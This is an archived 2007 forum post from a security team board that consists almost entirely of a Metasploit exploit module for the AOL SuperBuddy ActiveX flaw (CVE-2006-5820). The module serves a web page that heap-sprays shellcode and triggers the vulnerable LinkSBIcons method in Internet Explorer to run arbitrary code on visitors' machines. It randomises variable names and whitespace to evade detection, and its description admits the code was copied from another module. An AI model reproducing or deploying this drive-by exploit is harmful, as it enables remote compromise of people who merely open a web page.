邪恶八进制信息安全团队技术讨论组's Archiver

pub!1c 2007-4-5 17:49

AOL SuperBuddy ActiveX Control Remote Code Execution Exploit (meta)

[code]require 'msf/core'

module Msf

class Exploits::Windows::Browser::AOL_SuperBuddy_LinkSBIcons < Msf::Exploit::Remote

  include Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      &#39;Name&#39;      => &#39;AOL Sb.Superbuddy vulnerability&#39;,
      &#39;Description&#39;  => %q{
        This module exploits a flaw in AOL Sb.SuperBuddy. We stole this code from a pre-existing metasploit module.
      },
      &#39;License&#39;    => MSF_LICENSE,
      &#39;Author&#39;     =>
        [
          &#39;kradchad&#39;,
          &#39;leetpete&#39;
        ],
      &#39;Version&#39;    => &#39;0.1&#39;,
      &#39;References&#39;   =>
        [
          [ &#39;CVE&#39;, &#39;CVE-2006-5820&#39;]
        ],
      &#39;Payload&#39;    =>
        {
          &#39;Space&#39;     => 1024,
          &#39;BadChars&#39;    => "\x00",
  
        },
      &#39;Platform&#39;    => &#39;win&#39;,
      &#39;Targets&#39;    =>
        [
          [&#39;Windows XP SP0-SP2 / IE 6.0SP1 English&#39;, {&#39;Ret&#39; => 0x0c0c0c0c} ]
        ],
      &#39;DefaultTarget&#39; => 0))
  end

  def autofilter
    false
  end
  
  def on_request_uri(cli, request)

    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    # Encode the shellcode
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
   
    # Get a unicode friendly version of the return address
    addr_word = [target.ret].pack(&#39;V&#39;).unpack(&#39;H*&#39;)[0][0,4]

    # Randomize the javascript variable names  
    var_buffer  = rand_text_alpha(rand(30)+2)
    var_shellcode = rand_text_alpha(rand(30)+2)
    var_unescape = rand_text_alpha(rand(30)+2)
    var_x     = rand_text_alpha(rand(30)+2)
    var_i     = rand_text_alpha(rand(30)+2)
    var_tic    = rand_text_alpha(rand(30)+2)
    var_toc    = rand_text_alpha(rand(30)+2)
   
    # Randomize HTML data
    html     = rand_text_alpha(rand(30)+2)
   
    # Build out the message
    content = %Q|
<html>
<head>
  <script>
  try {
  
  var #{var_unescape} = unescape ;
  var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;
  
  var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
  while (#{var_buffer}.length <= 0x100000) #{var_buffer}+=#{var_buffer} ;

  var #{var_x} = new Array() ;  
  for ( var #{var_i} =0 ; #{var_i} < 120 ; #{var_i}++ ) {
    #{var_x}[ #{var_i} ] =     
      #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;
  }
  
  
    var #{var_tic} = new ActiveXObject( &#39;Sb.SuperBuddy.1&#39; );  
  try { #{var_tic}.LinkSBIcons( #{target.ret} ) ; } catch( e ) { }

  
  } catch( e ) { window.location = &#39;about:blank&#39; ; }
  
  </script>
</head>
<body>
#{html}
</body>
</html>   
    |

    # Randomize the whitespace in the document
    content.gsub!(/\s+/) do |s|
      len = rand(100)+2
      set = "\x09\x20\x0d\x0a"
      buf = &#39;&#39;
      
      while (buf.length < len)
        buf << set[rand(set.length)].chr
      end
      
      buf
    end
   
    print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

    # Transmit the response to the client
    send_response_html(cli, content)
  end

end

end


[/code]

页: [1]
© 1999-2008 EvilOctal Security Team